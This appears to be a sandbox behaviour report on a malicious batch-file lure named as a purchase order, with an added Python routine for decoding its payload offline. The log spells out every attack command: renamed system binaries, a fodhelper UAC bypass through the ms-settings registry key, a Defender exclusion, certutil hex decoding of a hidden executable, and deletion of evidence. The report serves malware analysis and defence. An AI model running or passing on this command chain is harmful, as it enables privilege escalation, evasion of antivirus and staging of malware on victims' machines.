Source: C:\Users\Public\alpha.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
Source: C:\Users\Public\alpha.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
Source: C:\Users\Public\xkn.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\extrac32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1956,i,11964562257046214624,14274192803590327640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\Public\xkn.exe | Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Users\Public\xkn.exe | Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: unknown | Process created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\Libraries\sppsvc.pif C:\Users\Public\Libraries\sppsvc.pif
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
Source: C:\Users\Public\Libraries\sppsvc.pif | Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF
Source: unknown | Process created: C:\Users\Public\Libraries\Kpeyvroh.PIF "C:\Users\Public\Libraries\Kpeyvroh.PIF"
Source: unknown | Process created: C:\Users\Public\Libraries\Kpeyvroh.PIF "C:\Users\Public\Libraries\Kpeyvroh.PIF"
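The two kn.exe invocations above are certutil -decodehex run under a copied name: first on the .cmd lure itself (format 9, output sppsvc.rtf), then on that intermediate (format 12, output Libraries\sppsvc.pif). The following is an added example, not part of the sandbox report, that re-creates both stages offline so the final stage can be carved from the lure without executing it. The meaning of the format numbers is taken from the CryptStringToBinary constants in the Windows SDK's wincrypt.h (9 = CRYPT_STRING_BASE64X509CRLHEADER, 12 = CRYPT_STRING_HEXRAW); the lure text and its MZ-headed stub payload are constructed, and that certutil accepts the CRL block anywhere in the file, as this code does, is an assumption the report does not state.

```python
"""Offline re-creation of the two certutil -decodehex stages (kn.exe is a
renamed certutil.exe) seen in the process chain above. Added example, not
part of the sandbox report. Format numbers per Windows SDK wincrypt.h:
9 = CRYPT_STRING_BASE64X509CRLHEADER, 12 = CRYPT_STRING_HEXRAW (assumed to
be what certutil applies). The lure below is constructed; its payload is a
stub, not a real executable."""
import base64
import binascii
import re

CRL_BEGIN = "-----BEGIN X509 CRL-----"
CRL_END = "-----END X509 CRL-----"
CRL_BLOCK = re.compile(re.escape(CRL_BEGIN) + r"(.*?)" + re.escape(CRL_END), re.S)


def decode_type9(text: str) -> bytes:
    """Stage 1 (format 9): base64 between X509 CRL header lines. Only the
    block is decoded and the batch commands around it are ignored, which is
    what lets one file be both a runnable .cmd and the payload carrier.
    Assumption: certutil, like this function, takes the block wherever it is."""
    m = CRL_BLOCK.search(text)
    if m is None:
        raise ValueError("no X509 CRL block in input")
    return base64.b64decode("".join(m.group(1).split()), validate=True)


def decode_type12(data: bytes) -> bytes:
    """Stage 2 (format 12): bare hex digits, line breaks tolerated."""
    return binascii.unhexlify(re.sub(rb"\s+", b"", data))


def carve_payload(lure_text: str) -> bytes:
    """Chain the stages as the two kn.exe invocations do:
    .cmd -> sppsvc.rtf (stage 1) -> Libraries\\sppsvc.pif (stage 2)."""
    return decode_type12(decode_type9(lure_text))


def looks_like_pe(blob: bytes) -> bool:
    """Cheap sanity check on the carved result: DOS header magic."""
    return blob[:2] == b"MZ"


# Constructed lure: two batch lines mirroring the chain above, then the
# encoded block. FAKE_PAYLOAD is an MZ-headed stub, not a real executable.
FAKE_PAYLOAD = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 28
STAGE1_HEX = binascii.hexlify(FAKE_PAYLOAD)          # what stage 1 yields
_b64 = base64.b64encode(STAGE1_HEX).decode()
CONSTRUCTED_LURE = "\r\n".join(
    ["@echo off",
     r"extrac32 /C /Y C:\Windows\System32\certutil.exe C:\Users\Public\kn.exe",
     CRL_BEGIN]
    + [_b64[i:i + 64] for i in range(0, len(_b64), 64)]   # 64-char PEM lines
    + [CRL_END, ""]
)

if __name__ == "__main__":
    carved = carve_payload(CONSTRUCTED_LURE)
    print(len(carved), "bytes carved, PE header present:", looks_like_pe(carved))
```

Run against a real lure, replace CONSTRUCTED_LURE with the file contents read as text; if decode_type9 raises, the sample uses a different carrier format and the format number in the kn.exe command line is the first thing to re-check.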
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1956,i,11964562257046214624,14274192803590327640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Users\Public\Libraries\sppsvc.pif | Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: textshaping.dll
Source: C:\Users\Public\xkn.exe | Section loaded: atl.dll
Source: C:\Users\Public\xkn.exe | Section loaded: mscoree.dll
Source: C:\Users\Public\xkn.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\Public\xkn.exe | Section loaded: version.dll
Source: C:\Users\Public\xkn.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\xkn.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\xkn.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\xkn.exe | Section loaded: rsaenh.dll
Source: C:\Users\Public\xkn.exe | Section loaded: cryptbase.dll
Source: C:\Users\Public\xkn.exe | Section loaded: amsi.dll
Source: C:\Users\Public\xkn.exe | Section loaded: userenv.dll
Source: C:\Users\Public\xkn.exe | Section loaded: profapi.dll
Source: C:\Users\Public\xkn.exe | Section loaded: windows.storage.dll
Source: C:\Users\Public\xkn.exe | Section loaded: wldp.dll
Source: C:\Users\Public\xkn.exe | Section loaded: msasn1.dll
Source: C:\Users\Public\xkn.exe | Section loaded: gpapi.dll
Source: C:\Users\Public\xkn.exe | Section loaded: msisip.dll
Source: C:\Users\Public\xkn.exe | Section loaded: wshext.dll
Source: C:\Users\Public\xkn.exe | Section loaded: appxsip.dll
Source: C:\Users\Public\xkn.exe | Section loaded: opcservices.dll
Source: C:\Users\Public\xkn.exe | Section loaded: secur32.dll
Source: C:\Users\Public\xkn.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\xkn.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\xkn.exe | Section loaded: propsys.dll
Source: C:\Users\Public\xkn.exe | Section loaded: edputil.dll
Source: C:\Users\Public\xkn.exe | Section loaded: urlmon.dll
Source: C:\Users\Public\xkn.exe | Section loaded: iertutil.dll
Source: C:\Users\Public\xkn.exe | Section loaded: srvcli.dll
Source: C:\Users\Public\xkn.exe | Section loaded: netutils.dll
Source: C:\Users\Public\xkn.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\xkn.exe | Section loaded: wintypes.dll
Source: C:\Users\Public\xkn.exe | Section loaded: appresolver.dll
Source: C:\Users\Public\xkn.exe | Section loaded: bcp47langs.dll
Source: C:\Users\Public\xkn.exe | Section loaded: slc.dll
Source: C:\Users\Public\xkn.exe | Section loaded: sppc.dll
Source: C:\Users\Public\xkn.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Public\xkn.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: ieframe.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: version.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: twinui.appcore.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: mrmcorer.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: windows.ui.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: windowmanagementapi.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: inputhost.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\fodhelper.exe | Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: systemsettingsthresholdadminflowui.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: newdev.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: dui70.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: logoncli.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: dismapi.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: timesync.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: winbrand.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: wincorlib.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: devobj.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: devrtl.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: version.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: settingshandlers_nt.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: errordetailscore.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\SystemSettingsAdminFlows.exe | Section loaded: windows.staterepositorycore.dll
Source: C:\Users\Public\kn.exe | Section loaded: certcli.dll
Source: C:\Users\Public\kn.exe | Section loaded: cabinet.dll
Source: C:\Users\Public\kn.exe | Section loaded: cryptui.dll
Source: C:\Users\Public\kn.exe | Section loaded: ncrypt.dll
Source: C:\Users\Public\kn.exe | Section loaded: netapi32.dll
Source: C:\Users\Public\kn.exe | Section loaded: ntdsapi.dll
Source: C:\Users\Public\kn.exe | Section loaded: version.dll
Source: C:\Users\Public\kn.exe | Section loaded: secur32.dll
Source: C:\Users\Public\kn.exe | Section loaded: certca.dll
Source: C:\Users\Public\kn.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\kn.exe | Section loaded: samcli.dll
Source: C:\Users\Public\kn.exe | Section loaded: logoncli.dll
Source: C:\Users\Public\kn.exe | Section loaded: dsrole.dll
Source: C:\Users\Public\kn.exe | Section loaded: netutils.dll
Source: C:\Users\Public\kn.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\kn.exe | Section loaded: ntasn1.dll
Source: C:\Users\Public\kn.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\kn.exe | Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: version.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: archiveint.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: url.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: mapi32.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: mswsock.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: iphlpapi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: winnsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: dnsapi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: rasadhlp.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: fwpuclnt.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: winhttpcom.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: webio.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: schannel.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: mskeyprotect.dll
